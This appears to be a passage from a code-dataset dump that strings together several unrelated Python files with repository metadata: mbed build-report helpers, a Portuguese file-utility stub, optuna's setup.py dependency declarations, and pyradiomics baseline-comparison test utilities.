separate_names, separate_objects = ['mbed_retarget.o', 'mbed_board.o',
'mbed_overrides.o', 'mbed_main.o', 'mbed_sdk_boot.o'], []
for obj in objects:
for name in separate_names:
if obj.endswith(name):
separate_objects.append(obj)
for obj in separate_objects:
objects.remove(obj)
toolchain.build_library(objects, build_toolchain, "mbed")
for obj in separate_objects:
toolchain.copy_files(obj, build_toolchain)
if report != None:
end = time()
cur_result["elapsed_time"] = end - start
cur_result["output"] = toolchain.get_output()
cur_result["result"] = "OK"
add_result_to_report(report, cur_result)
return True
except Exception as exc:
if report != None:
end = time()
cur_result["result"] = "FAIL"
cur_result["elapsed_time"] = end - start
toolchain_output = toolchain.get_output()
if toolchain_output:
cur_result["output"] += toolchain_output
cur_result["output"] += str(exc)
add_result_to_report(report, cur_result)
raise
def get_unique_supported_toolchains(release_targets=None):
""" Get list of all unique toolchains supported by targets
Keyword arguments:
release_targets - tuple structure returned from get_mbed_official_release().
If release_targets is not specified, then it queries all
known targets
"""
unique_supported_toolchains = []
if not release_targets:
for target in TARGET_NAMES:
for toolchain in TARGET_MAP[target].supported_toolchains:
if toolchain not in unique_supported_toolchains:
unique_supported_toolchains.append(toolchain)
else:
for target in release_targets:
for toolchain in target[1]:
if toolchain not in unique_supported_toolchains:
unique_supported_toolchains.append(toolchain)
if "ARM" in unique_supported_toolchains:
unique_supported_toolchains.append("ARMC6")
return unique_supported_toolchains
def mcu_toolchain_list(release_version='5'):
""" Shows list of toolchains
"""
if isinstance(release_version, basestring):
release_version = release_version.lower()
else:
release_version = 'all'
version_release_targets = {}
version_release_target_names = {}
for version in RELEASE_VERSIONS:
version_release_targets[version] = get_mbed_official_release(version)
version_release_target_names[version] = [x[0] for x in
version_release_targets[
version]]
if release_version in RELEASE_VERSIONS:
release_targets = version_release_targets[release_version]
else:
release_targets = None
unique_supported_toolchains = get_unique_supported_toolchains(
release_targets)
columns = ["mbed OS %s" % x for x in RELEASE_VERSIONS] + unique_supported_toolchains
return "\n".join(columns)
def mcu_target_list(release_version='5'):
""" Shows target list
"""
if isinstance(release_version, basestring):
release_version = release_version.lower()
else:
release_version = 'all'
version_release_targets = {}
version_release_target_names = {}
for version in RELEASE_VERSIONS:
version_release_targets[version] = get_mbed_official_release(version)
version_release_target_names[version] = [x[0] for x in
version_release_targets[
version]]
if release_version in RELEASE_VERSIONS:
release_targets = version_release_targets[release_version]
else:
release_targets = None
target_names = []
if release_targets:
target_names = [x[0] for x in release_targets]
else:
target_names = TARGET_NAMES
return "\n".join(target_names)
def mcu_toolchain_matrix(verbose_html=False, platform_filter=None,
release_version='5'):
""" Shows target map using prettytable
Keyword arguments:
verbose_html - emit html instead of a simple table
platform_filter - remove results that match the string
release_version - get the matrix for this major version number
"""
from prettytable import PrettyTable
if isinstance(release_version, basestring):
release_version = release_version.lower()
else:
release_version = 'all'
version_release_targets = {}
version_release_target_names = {}
for version in RELEASE_VERSIONS:
version_release_targets[version] = get_mbed_official_release(version)
version_release_target_names[version] = [x[0] for x in
version_release_targets[
version]]
if release_version in RELEASE_VERSIONS:
release_targets = version_release_targets[release_version]
else:
release_targets = None
unique_supported_toolchains = get_unique_supported_toolchains(
release_targets)
prepend_columns = ["Target"] + ["mbed OS %s" % x for x in RELEASE_VERSIONS]
columns = prepend_columns + unique_supported_toolchains
table_printer = PrettyTable(columns)
for col in columns:
table_printer.align[col] = "c"
table_printer.align["Target"] = "l"
perm_counter = 0
target_counter = 0
target_names = []
if release_targets:
target_names = [x[0] for x in release_targets]
else:
target_names = TARGET_NAMES
for target in sorted(target_names):
if platform_filter is not None:
if re.search(platform_filter, target) is None:
continue
target_counter += 1
row = [target]
for version in RELEASE_VERSIONS:
if target in version_release_target_names[version]:
text = "Supported"
else:
text = "-"
row.append(text)
for unique_toolchain in unique_supported_toolchains:
if (unique_toolchain in TARGET_MAP[target].supported_toolchains or
(unique_toolchain == "ARMC6" and
"ARM" in TARGET_MAP[target].supported_toolchains)):
text = "Supported"
perm_counter += 1
else:
text = "-"
row.append(text)
table_printer.add_row(row)
result = table_printer.get_html_string() if verbose_html \
else table_printer.get_string()
result += "\n"
result += "Supported targets: %d\n"% (target_counter)
if target_counter == 1:
result += "Supported toolchains: %d"% (perm_counter)
return result
def get_target_supported_toolchains(target):
""" Returns target supported toolchains list
Positional arguments:
target - the target to get the supported toolchains of
"""
return TARGET_MAP[target].supported_toolchains if target in TARGET_MAP \
else None
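# A small sketch of the lookup above; it returns None for unknown target names,
# which the caller has to handle, as shown with the placeholder below.
def _example_supported_toolchains(target_name="K64F"):
    toolchains = get_target_supported_toolchains(target_name)
    return toolchains if toolchains is not None else []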
def print_build_results(result_list, build_name):
""" Generate result string for build results
Positional arguments:
result_list - the list of results to print
build_name - the name of the build we are printing result for
"""
result = ""
if len(result_list) > 0:
result += build_name + "\n"
result += "\n".join([" * %s" % f for f in result_list])
result += "\n"
return result
def print_build_memory_usage(report):
""" Generate result table with memory usage values for build results
Aggregates (puts together) reports obtained from self.get_memory_summary()
Positional arguments:
report - Report generated during build procedure.
"""
from prettytable import PrettyTable
columns_text = ['name', 'target', 'toolchain']
columns_int = ['static_ram', 'total_flash']
table = PrettyTable(columns_text + columns_int)
for col in columns_text:
table.align[col] = 'l'
for col in columns_int:
table.align[col] = 'r'
for target in report:
for toolchain in report[target]:
for name in report[target][toolchain]:
for dlist in report[target][toolchain][name]:
for dlistelem in dlist:
record = dlist[dlistelem]
if 'memory_usage' in record and record['memory_usage']:
row = [
record['description'],
record['target_name'],
record['toolchain_name'],
record['memory_usage'][-1]['summary'][
'static_ram'],
record['memory_usage'][-1]['summary'][
'total_flash'],
]
table.add_row(row)
result = "Memory map breakdown for built projects (values in Bytes):\n"
result += table.get_string(sortby='name')
return result
def write_build_report(build_report, template_filename, filename):
"""Write a build report to disk using a template file
Positional arguments:
build_report - a report generated by the build system
template_filename - a file that contains the template for the style of build
report
filename - the location on disk to write the file to
"""
build_report_failing = []
build_report_passing = []
for report in build_report:
if len(report["failing"]) > 0:
build_report_failing.append(report)
else:
build_report_passing.append(report)
env = Environment(extensions=['jinja2.ext.with_'])
env.loader = FileSystemLoader('ci_templates')
template = env.get_template(template_filename)
with open(filename, 'w+') as placeholder:
placeholder.write(template.render(
failing_builds=build_report_failing,
passing_builds=build_report_passing))
def merge_build_data(filename, toolchain_report, app_type):
path_to_file = dirname(abspath(filename))
try:
build_data = load(open(filename))
except (IOError, ValueError):
build_data = {'builds': []}
for tgt in toolchain_report.values():
for tc in tgt.values():
for project in tc.values():
for build in project:
try:
build[0]['elf'] = relpath(build[0]['elf'], path_to_file)
build[0]['bin'] = relpath(build[0]['bin'], path_to_file)
except KeyError:
pass
if 'type' not in build[0]:
build[0]['type'] = app_type
build_data['builds'].append(build[0])
dump(build_data, open(filename, "wb"), indent=4, separators=(',', ': '))
| false
| true
|
790b1bcd69de3a7ca25a03a56710c8f20a956051
| 1,088
|
py
|
Python
|
bibli/arquivo/__init__.py
|
EduardoPessanha/Python
|
ac248a14288da2dd9c482afea30468c21db5460f
|
[
"MIT"
] | null | null | null |
bibli/arquivo/__init__.py
|
EduardoPessanha/Python
|
ac248a14288da2dd9c482afea30468c21db5460f
|
[
"MIT"
] | 1
|
2021-11-16T16:12:41.000Z
|
2021-11-16T16:15:08.000Z
|
bibli/arquivo/__init__.py
|
EduardoPessanha/Python
|
ac248a14288da2dd9c482afea30468c21db5460f
|
[
"MIT"
] | null | null | null |
def testaArq(arq):
"""
-> Verifica se existe o arquivo arq
:arq: Nome do arquivo a ser testado.
:return: retorna True se o arquivo for encontrado,
caso contrário False
"""
try:
a = open(arq)
except FileNotFoundError:  # The file was not found
print('Arquivo não encontrado!')
return False
else:
return True
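# A minimal usage sketch, assuming a placeholder file name; it simply forwards
# the boolean returned by testaArq() above.
def exemploTesta(arq='exemplo.txt'):
    return testaArq(arq)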
def criaArq(arq=''):
"""
-> Cria um arquivo de texto, caso ele não exista.
:param arq: Nome do arquivo.
:return:
"""
try:
    a = open(arq, 'xt')
except FileExistsError:
    print(f'ERRO: o arquivo \"{arq}\" já existe!')
else:
    print(f'O arquivo \"{arq}\" foi criado com sucesso!')
    # close the handle only when the file was actually created
    a.close()
return
def leArq(arq=''):
"""
-> Abre e mostra os itens de um arquivo texto.
:param arq: Nome do arquivo.
:return:
"""
return
def editaArq(arq):
"""
-> Abre um arquivo de texto e adiciona novo item no
final do arquivo.
:param arq: Nome do arquivo.
:return:
"""
return
| 21.333333
| 61
| 0.560662
|
def testaArq(arq):
try:
a = open(arq)
except FileNotFoundError:
print('Arquivo não encontrado!')
return False
else:
return True
def criaArq(arq=''):
try:
    a = open(arq, 'xt')
except FileExistsError:
    print(f'ERRO: o arquivo \"{arq}\" já existe!')
else:
    print(f'O arquivo \"{arq}\" foi criado com sucesso!')
    a.close()
return
def leArq(arq=''):
return
def editaArq(arq):
return
| true
| true
|
790b1c298f3504e67b502f6aa388aaf3fd5051a2
| 7,862
|
py
|
Python
|
setup.py
|
PhilipMay/optuna
|
81840c2e08f452bd5ac959afaca0fee006bdb44e
|
[
"MIT"
] | null | null | null |
setup.py
|
PhilipMay/optuna
|
81840c2e08f452bd5ac959afaca0fee006bdb44e
|
[
"MIT"
] | null | null | null |
setup.py
|
PhilipMay/optuna
|
81840c2e08f452bd5ac959afaca0fee006bdb44e
|
[
"MIT"
] | null | null | null |
import os
import sys
from typing import Dict
from typing import List
from typing import Optional
import pkg_resources
from setuptools import find_packages
from setuptools import setup
def get_version() -> str:
version_filepath = os.path.join(os.path.dirname(__file__), "optuna", "version.py")
with open(version_filepath) as f:
for line in f:
if line.startswith("__version__"):
return line.strip().split()[-1][1:-1]
assert False
def get_long_description() -> str:
readme_filepath = os.path.join(os.path.dirname(__file__), "README.md")
with open(readme_filepath) as f:
return f.read()
def get_install_requires() -> List[str]:
return [
"alembic",
"cliff",
"cmaes>=0.6.0",
"colorlog",
"joblib",
"numpy",
"packaging>=20.0",
"scipy!=1.4.0",
"sqlalchemy>=1.1.0",
"tqdm",
]
def get_tests_require() -> List[str]:
return get_extras_require()["testing"]
def get_extras_require() -> Dict[str, List[str]]:
requirements = {
"checking": ["black", "hacking", "isort", "mypy==0.782", "blackdoc"],
"codecov": ["codecov", "pytest-cov"],
"doctest": [
"cma",
"matplotlib>=3.0.0",
"pandas",
"plotly>=4.0.0",
"scikit-learn>=0.19.0,<0.23.0",
"scikit-optimize",
"mlflow",
],
"document": [
# TODO(hvy): Unpin `sphinx` version after:
# https://github.com/sphinx-doc/sphinx/issues/8105.
"sphinx==3.0.4",
# As reported in: https://github.com/readthedocs/sphinx_rtd_theme/issues/949,
# `sphinx_rtd_theme` 0.5.0 is still not compatible with `sphinx` >= 3.0.
"sphinx_rtd_theme<0.5.0",
"sphinx-gallery",
"sphinx-plotly-directive",
"pillow",
"matplotlib",
"scikit-learn",
],
"example": [
"catboost",
"chainer",
"lightgbm",
"mlflow",
"mpi4py",
"mxnet",
"nbval",
"scikit-image",
"scikit-learn>=0.19.0,<0.23.0", # optuna/visualization/param_importances.py.
"xgboost",
"keras",
"tensorflow>=2.0.0",
"tensorflow-datasets",
"pytorch-ignite",
"pytorch-lightning>=0.8.1",
"thop",
"skorch",
"stable-baselines3>=0.7.0",
"catalyst",
]
+ (
["torch==1.7.0", "torchvision==0.8.1", "torchaudio==0.7.0"]
if sys.platform == "darwin"
else ["torch==1.7.0+cpu", "torchvision==0.8.1+cpu", "torchaudio==0.7.0"]
)
+ (
[
"allennlp==1.2.0",
"fastai<2",
"dask[dataframe]",
"dask-ml",
]
if sys.version_info[:2] < (3, 8)
else []
),
"experimental": ["redis"],
"testing": [
# TODO(toshihikoyanase): Remove the version constraint after resolving the issue
# https://github.com/optuna/optuna/issues/1000.
"bokeh<2.0.0",
"chainer>=5.0.0",
"cma",
"fakeredis",
"lightgbm",
"matplotlib>=3.0.0",
"mlflow",
"mpi4py",
"mxnet",
"pandas",
"plotly>=4.0.0",
"pytest",
"scikit-learn>=0.19.0,<0.23.0",
"scikit-optimize",
"xgboost",
"keras",
"tensorflow",
"tensorflow-datasets",
"pytorch-ignite",
"pytorch-lightning>=0.8.1",
"skorch",
"catalyst",
]
+ (
["torch==1.7.0", "torchvision==0.8.1", "torchaudio==0.7.0"]
if sys.platform == "darwin"
else ["torch==1.7.0+cpu", "torchvision==0.8.1+cpu", "torchaudio==0.7.0"]
)
+ (["allennlp==1.2.0", "fastai<2"] if sys.version_info[:2] < (3, 8) else []),
"tests": ["fakeredis", "pytest"],
"optional": [
"bokeh<2.0.0", # optuna/cli.py, optuna/dashboard.py.
"matplotlib>=3.0.0", # optuna/visualization/matplotlib
"pandas", # optuna/study.py
"plotly>=4.0.0", # optuna/visualization.
"redis", # optuna/storages/redis.py.
"scikit-learn>=0.19.0,<0.23.0", # optuna/visualization/param_importances.py.
],
"integration": [
# TODO(toshihikoyanase): Remove the version constraint after resolving the issue
# https://github.com/optuna/optuna/issues/1000.
"chainer>=5.0.0",
"cma",
"lightgbm",
"mlflow",
"mpi4py",
"mxnet",
"pandas",
"scikit-learn>=0.19.0,<0.23.0",
"scikit-optimize",
"xgboost",
"keras",
"tensorflow",
"tensorflow-datasets",
"pytorch-ignite",
"pytorch-lightning>=0.8.1",
"skorch",
"catalyst",
]
+ (
["torch==1.7.0", "torchvision==0.8.1", "torchaudio==0.7.0"]
if sys.platform == "darwin"
else ["torch==1.7.0+cpu", "torchvision==0.8.1+cpu", "torchaudio==0.7.0"]
)
+ (["allennlp==1.2.0", "fastai<2"] if sys.version_info[:2] < (3, 8) else []),
}
return requirements
def find_any_distribution(pkgs: List[str]) -> Optional[pkg_resources.Distribution]:
for pkg in pkgs:
try:
return pkg_resources.get_distribution(pkg)
except pkg_resources.DistributionNotFound:
pass
return None
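# A small sketch of how find_any_distribution() can gate optional behaviour;
# the package name below is purely illustrative and the check has no side effects.
def _example_has_package():
    return find_any_distribution(["wheel"]) is not None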
setup(
name="optuna",
version=get_version(),
description="A hyperparameter optimization framework",
long_description=get_long_description(),
long_description_content_type="text/markdown",
author="Takuya Akiba",
author_email="akiba@preferred.jp",
url="https://optuna.org/",
packages=find_packages(),
package_data={
"optuna": [
"storages/_rdb/alembic.ini",
"storages/_rdb/alembic/*.*",
"storages/_rdb/alembic/versions/*.*",
"py.typed",
]
},
python_requires=">=3.6",
install_requires=get_install_requires(),
tests_require=get_tests_require(),
extras_require=get_extras_require(),
entry_points={
"console_scripts": ["optuna = optuna.cli:main"],
"optuna.command": [
"create-study = optuna.cli:_CreateStudy",
"delete-study = optuna.cli:_DeleteStudy",
"study set-user-attr = optuna.cli:_StudySetUserAttribute",
"studies = optuna.cli:_Studies",
"dashboard = optuna.cli:_Dashboard",
"study optimize = optuna.cli:_StudyOptimize",
"storage upgrade = optuna.cli:_StorageUpgrade",
],
},
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Science/Research",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3 :: Only",
"Topic :: Scientific/Engineering",
"Topic :: Scientific/Engineering :: Mathematics",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Topic :: Software Development",
"Topic :: Software Development :: Libraries",
"Topic :: Software Development :: Libraries :: Python Modules",
],
)
| 31.574297
| 92
| 0.512338
|
import os
import sys
from typing import Dict
from typing import List
from typing import Optional
import pkg_resources
from setuptools import find_packages
from setuptools import setup
def get_version() -> str:
version_filepath = os.path.join(os.path.dirname(__file__), "optuna", "version.py")
with open(version_filepath) as f:
for line in f:
if line.startswith("__version__"):
return line.strip().split()[-1][1:-1]
assert False
def get_long_description() -> str:
readme_filepath = os.path.join(os.path.dirname(__file__), "README.md")
with open(readme_filepath) as f:
return f.read()
def get_install_requires() -> List[str]:
return [
"alembic",
"cliff",
"cmaes>=0.6.0",
"colorlog",
"joblib",
"numpy",
"packaging>=20.0",
"scipy!=1.4.0",
"sqlalchemy>=1.1.0",
"tqdm",
]
def get_tests_require() -> List[str]:
return get_extras_require()["testing"]
def get_extras_require() -> Dict[str, List[str]]:
requirements = {
"checking": ["black", "hacking", "isort", "mypy==0.782", "blackdoc"],
"codecov": ["codecov", "pytest-cov"],
"doctest": [
"cma",
"matplotlib>=3.0.0",
"pandas",
"plotly>=4.0.0",
"scikit-learn>=0.19.0,<0.23.0",
"scikit-optimize",
"mlflow",
],
"document": [
"sphinx==3.0.4",
"sphinx_rtd_theme<0.5.0",
"sphinx-gallery",
"sphinx-plotly-directive",
"pillow",
"matplotlib",
"scikit-learn",
],
"example": [
"catboost",
"chainer",
"lightgbm",
"mlflow",
"mpi4py",
"mxnet",
"nbval",
"scikit-image",
"scikit-learn>=0.19.0,<0.23.0",
"xgboost",
"keras",
"tensorflow>=2.0.0",
"tensorflow-datasets",
"pytorch-ignite",
"pytorch-lightning>=0.8.1",
"thop",
"skorch",
"stable-baselines3>=0.7.0",
"catalyst",
]
+ (
["torch==1.7.0", "torchvision==0.8.1", "torchaudio==0.7.0"]
if sys.platform == "darwin"
else ["torch==1.7.0+cpu", "torchvision==0.8.1+cpu", "torchaudio==0.7.0"]
)
+ (
[
"allennlp==1.2.0",
"fastai<2",
"dask[dataframe]",
"dask-ml",
]
if sys.version_info[:2] < (3, 8)
else []
),
"experimental": ["redis"],
"testing": [
"bokeh<2.0.0",
"chainer>=5.0.0",
"cma",
"fakeredis",
"lightgbm",
"matplotlib>=3.0.0",
"mlflow",
"mpi4py",
"mxnet",
"pandas",
"plotly>=4.0.0",
"pytest",
"scikit-learn>=0.19.0,<0.23.0",
"scikit-optimize",
"xgboost",
"keras",
"tensorflow",
"tensorflow-datasets",
"pytorch-ignite",
"pytorch-lightning>=0.8.1",
"skorch",
"catalyst",
]
+ (
["torch==1.7.0", "torchvision==0.8.1", "torchaudio==0.7.0"]
if sys.platform == "darwin"
else ["torch==1.7.0+cpu", "torchvision==0.8.1+cpu", "torchaudio==0.7.0"]
)
+ (["allennlp==1.2.0", "fastai<2"] if sys.version_info[:2] < (3, 8) else []),
"tests": ["fakeredis", "pytest"],
"optional": [
"bokeh<2.0.0",
"matplotlib>=3.0.0",
"pandas",
"plotly>=4.0.0",
"redis",
"scikit-learn>=0.19.0,<0.23.0",
],
"integration": [
"chainer>=5.0.0",
"cma",
"lightgbm",
"mlflow",
"mpi4py",
"mxnet",
"pandas",
"scikit-learn>=0.19.0,<0.23.0",
"scikit-optimize",
"xgboost",
"keras",
"tensorflow",
"tensorflow-datasets",
"pytorch-ignite",
"pytorch-lightning>=0.8.1",
"skorch",
"catalyst",
]
+ (
["torch==1.7.0", "torchvision==0.8.1", "torchaudio==0.7.0"]
if sys.platform == "darwin"
else ["torch==1.7.0+cpu", "torchvision==0.8.1+cpu", "torchaudio==0.7.0"]
)
+ (["allennlp==1.2.0", "fastai<2"] if sys.version_info[:2] < (3, 8) else []),
}
return requirements
def find_any_distribution(pkgs: List[str]) -> Optional[pkg_resources.Distribution]:
for pkg in pkgs:
try:
return pkg_resources.get_distribution(pkg)
except pkg_resources.DistributionNotFound:
pass
return None
setup(
name="optuna",
version=get_version(),
description="A hyperparameter optimization framework",
long_description=get_long_description(),
long_description_content_type="text/markdown",
author="Takuya Akiba",
author_email="akiba@preferred.jp",
url="https://optuna.org/",
packages=find_packages(),
package_data={
"optuna": [
"storages/_rdb/alembic.ini",
"storages/_rdb/alembic/*.*",
"storages/_rdb/alembic/versions/*.*",
"py.typed",
]
},
python_requires=">=3.6",
install_requires=get_install_requires(),
tests_require=get_tests_require(),
extras_require=get_extras_require(),
entry_points={
"console_scripts": ["optuna = optuna.cli:main"],
"optuna.command": [
"create-study = optuna.cli:_CreateStudy",
"delete-study = optuna.cli:_DeleteStudy",
"study set-user-attr = optuna.cli:_StudySetUserAttribute",
"studies = optuna.cli:_Studies",
"dashboard = optuna.cli:_Dashboard",
"study optimize = optuna.cli:_StudyOptimize",
"storage upgrade = optuna.cli:_StorageUpgrade",
],
},
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Science/Research",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3 :: Only",
"Topic :: Scientific/Engineering",
"Topic :: Scientific/Engineering :: Mathematics",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Topic :: Software Development",
"Topic :: Software Development :: Libraries",
"Topic :: Software Development :: Libraries :: Python Modules",
],
)
| true
| true
|
790b1cc12df560ef9f4e3ce6bcdbf341f94a9bba
| 14,093
|
py
|
Python
|
tests/testUtils.py
|
drmaxchen/pyradio
|
f2e46856425cfb233d29d391199bfb9b85824b06
|
[
"BSD-3-Clause"
] | 2
|
2020-09-11T01:04:07.000Z
|
2020-09-11T01:35:46.000Z
|
tests/testUtils.py
|
drmaxchen/pyradio
|
f2e46856425cfb233d29d391199bfb9b85824b06
|
[
"BSD-3-Clause"
] | null | null | null |
tests/testUtils.py
|
drmaxchen/pyradio
|
f2e46856425cfb233d29d391199bfb9b85824b06
|
[
"BSD-3-Clause"
] | 1
|
2020-09-11T01:04:46.000Z
|
2020-09-11T01:04:46.000Z
|
import ast
import csv
import logging
import math
import os
from nose_parameterized import parameterized
import numpy
import SimpleITK as sitk
import six
from radiomics import getTestCase, imageoperations
# Get the logger. This is done outside the class, as it is needed by both the class and the custom_name_func
logger = logging.getLogger('radiomics.testing')
TEST_CASES = ('brain1', 'brain2', 'breast1', 'lung1', 'lung2')
def custom_name_func(testcase_func, param_num, param):
"""
A custom test name function that ensures the tests are batched so that all tests for a given data set are run
together, avoiding re-reading the data more than necessary. Tests are run in alphabetical
order, so put the test case first. An alternate option is to right justify the test number (param_num) with zeroes
so that the numerical and alphabetical orders are the same. Not providing this method when there are more than 10
tests results in tests running in an order similar to:
test_*.test_scenario_0_*
test_*.test_scenario_10_*
test_*.test_scenario_11_*
...
test_*.test_scenario_19_*
test_*.test_scenario_1_*
test_*.test_scenario_20_*
"""
global logger
logger.debug('custom_name_func: function name = %s, param_num = {0:0>3}, param.args = %s'.format(param_num),
testcase_func.__name__, param.args)
return str("%s_%s" % (
testcase_func.__name__,
parameterized.to_safe_name("_".join(str(x) for x in param.args)),
))
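# Illustrative note (added): with hypothetical inputs where param.args is
# ('brain1', 'firstorder') and the test function is named 'test_scenario',
# custom_name_func returns 'test_scenario_brain1_firstorder', so alphabetical
# ordering keeps every test for the same test case adjacent.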
class RadiomicsTestUtils:
"""
This utility class reads and stores the baseline files found in 'data/baseline' (one per feature class).
It provides utility methods to get the baseline feature value for a feature class and compare it to the result generated
by the test.
"""
def __init__(self):
self._logger = logging.getLogger('radiomics.testing.utils')
self._logger.debug('RadiomicsTestUtils')
# the image and mask volumes
self._image = None
self._mask = None
self._current_image = None
self._current_mask = None
self._bb = None
self._imageType = None
# set up file paths
self._dataDir = os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", "data")
self._baselineDir = os.path.join(self._dataDir, 'baseline')
self._tests = set()
self._test = None # Test, specifies an image and mask and some configuration (settings)
self._testCase = None # Test image and mask to use in configured test
self._testedSet = set()
self._baseline = {}
self.readBaselineFiles()
self._current_config = {}
self._featureClassName = None
self._results = {}
self._diffs = {}
for test in self.getTests():
self._results[test] = {}
self._diffs[test] = {}
def readBaselineFiles(self):
"""
Reads the 'baseline' folder contained in dataDir. All files starting with 'baseline_' are read as baseline files.
These files should therefore be named as follows: 'baseline_<className>.csv'.
"""
baselineFiles = [fileName for fileName in os.listdir(self._baselineDir)
if os.path.isfile(os.path.join(self._baselineDir, fileName)) and fileName.startswith('baseline_')]
assert len(baselineFiles) > 0
for baselineFile in baselineFiles:
newBaseline = PyRadiomicsBaseline.readBaselineFile(os.path.join(self._baselineDir, baselineFile))
cls = newBaseline.cls
self._logger.debug('Read baseline for class %s', cls)
self._baseline[cls] = newBaseline
self._tests |= newBaseline.tests
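# For example (added note): a file named 'baseline_firstorder.csv' is parsed by
# PyRadiomicsBaseline.readBaselineFile below and registered under cls == 'firstorder'.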
def getTests(self):
"""
Return all the tests for which there are baseline information.
"""
return self._tests
def getFeatureNames(self, className, test):
"""
Gets all features for which a baseline value is available for the current class and test case. Returns a list
containing the feature names (without image type and feature class specifiers, i.e. just the feature name).
"""
if className not in self._baseline:
return None # No baseline available for specified class
return self._baseline[className].getTestFeatures(test)
def setFeatureClassAndTestCase(self, className, test):
"""
Set testing suite to the specified test case and feature class. Throws an assertion error if either the class or
the test case is not recognized. These have to be set here together, as the settings with which the test case has to be loaded
are defined per feature class in the baseline (extracted from provenance information).
Only (re)loads an image/mask if the test case has changed, or the change of feature class causes a change in test
settings.
If feature class and test case are unchanged, nothing is reloaded and function returns False. If either feature
class or test case is changed, function returns True.
"""
global TEST_CASES
if self._featureClassName == className and self._test == test:
return False
self._test = test
self._testedSet.add(self._test)
# First set featureClass if necessary, because if settings have changed, testCase needs to be reloaded
if self._featureClassName != className:
self._logger.debug('Setting feature class name to %s', className)
assert className in self._baseline.keys() # Check if a baseline has been read for this class
self._featureClassName = className
# Check if test settings have changed
if self._current_config != self._baseline[className].getTestConfig(test):
self._current_config = self._baseline[className].getTestConfig(test)
self._testCase = None # forces image to be reloaded (as settings have changed)
# Next, set testCase if necessary
if self._testCase != self._current_config['TestCase']:
self._testCase = self._current_config['TestCase']
self._logger.info("Reading the image and mask for test case %s", self._testCase)
assert self._current_config['TestCase'] in TEST_CASES
imageName, maskName = getTestCase(self._testCase)
assert imageName is not None
assert maskName is not None
self._image = sitk.ReadImage(imageName)
self._mask = sitk.ReadImage(maskName)
if 'ImageHash' in self._current_config:
assert sitk.Hash(self._image) == self._current_config['ImageHash']
if 'MaskHash' in self._current_config:
assert sitk.Hash(self._mask) == self._current_config['MaskHash']
settings = self._current_config.get('Settings', {})
interpolator = settings.get('interpolator', sitk.sitkBSpline)
resampledPixelSpacing = settings.get('resampledPixelSpacing', None)
if interpolator is not None and resampledPixelSpacing is not None:
self._image, self._mask = imageoperations.resampleImage(self._image,
self._mask,
resampledPixelSpacing,
interpolator,
settings.get('label', 1),
settings.get('padDistance', 5))
self._bb, correctedMask = imageoperations.checkMask(self._image, self._mask, **settings)
if correctedMask is not None:
self._mask = correctedMask
self._imageType = None
return True
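# Hedged usage sketch (added; the class and test names are hypothetical):
#   reloaded = utils.setFeatureClassAndTestCase('firstorder', 'brain1_baseline')
# returns True when the feature class or test case changed and the image/mask
# were (re)loaded, and False when nothing needed to be reloaded.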
def getImage(self, imageType):
if self._imageType != imageType:
self._applyFilter(imageType)
return self._current_image
def getMask(self, imageType):
if self._imageType != imageType:
self._applyFilter(imageType)
return self._current_mask
def _applyFilter(self, imageType):
if imageType == 'original':
self._current_image, self._current_mask = imageoperations.cropToTumorMask(self._image, self._mask, self._bb)
else:
raise NotImplementedError()
self._imageType = imageType
def getSettings(self):
return self._current_config.get('Settings', {})
def checkResult(self, featureName, value):
"""
Use utility methods to get and test the results against the expected baseline value for this key.
"""
longName = '_'.join(featureName)
if value is None:
self._diffs[self._test][longName] = None
self._results[self._test][longName] = None
assert (value is not None)
if math.isnan(value):
self._diffs[self._test][longName] = numpy.nan
self._results[self._test][longName] = numpy.nan
assert (not math.isnan(value))
# save the result using the baseline class and feature names
self._logger.debug('checkResults: featureName = %s', featureName)
self._results[self._test][longName] = value
baselineValue = self._baseline[self._featureClassName].getBaselineValue(self._test, longName)
assert baselineValue is not None
baselineValue = float(baselineValue)
self._logger.debug('checkResults: for featureName %s, got baseline value = %f', featureName, baselineValue)
if baselineValue == 0.0:
# avoid divide by zero, the difference is either 0% if the value is also zero, or 100%
if value - baselineValue == 0.0:
percentDiff = 0.0
else:
percentDiff = 1.0
else:
percentDiff = abs(1.0 - (value / baselineValue))
# save the difference
self._diffs[self._test][longName] = percentDiff
# check for a less than three percent difference
if (percentDiff >= 0.03):
self._logger.error('checkResult %s, baseline value = %f, calculated = %f, diff = %f%%', featureName,
float(baselineValue), value, percentDiff * 100)
assert (percentDiff < 0.03)
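# Worked example of the tolerance check above (added for clarity): with a
# baseline value of 2.0 and a calculated value of 2.05,
# percentDiff = abs(1.0 - 2.05 / 2.0) = 0.025 (2.5%), which is below the 3%
# threshold, so the assertion passes.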
def getResults(self):
return self._results
def getDiffs(self):
return self._diffs
def getDataDir(self):
return self._dataDir
def writeCSV(self, data, fileName):
"""
Write out data in a csv file.
Assumes a data structure with:
{'id1' : {'f1':n1, 'f2':n2}, 'id2' : {'f1':n3, 'f2':n4}}
"""
# Get the headers from the first testCase in _testedSet
# If no tests were run, the length of _testedSet will be 0, and no files should be written
if len(self._testedSet) > 0:
with open(fileName, 'w') as csvFile:
csvFileWriter = csv.writer(csvFile, lineterminator='\n')
testedCases = sorted(self._testedSet)
header = sorted(data[testedCases[0]].keys())
header = ['testCase'] + header
csvFileWriter.writerow(header)
for testCase in testedCases:
thisCase = data[testCase]
thisCase['testCase'] = testCase
row = []
for h in header:
row = row + [thisCase.get(h, "N/A")]
csvFileWriter.writerow(row)
self._logger.info('Wrote to file %s', fileName)
else:
self._logger.info('No test cases run, aborting file write to %s', fileName)
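def _example_write_csv(utils, file_name='example_results.csv'):
    """Hedged usage sketch added for illustration; not part of the original suite.

    Shows the nested-dict shape that ``RadiomicsTestUtils.writeCSV`` expects:
    test-case names mapping to ``{featureName: value}`` dictionaries. Note that
    ``writeCSV`` only writes rows for cases recorded in ``utils._testedSet``.
    """
    data = {
        'brain1_case': {'Mean': 1.0, 'Variance': 2.0},
        'brain2_case': {'Mean': 3.0, 'Variance': 4.0},
    }
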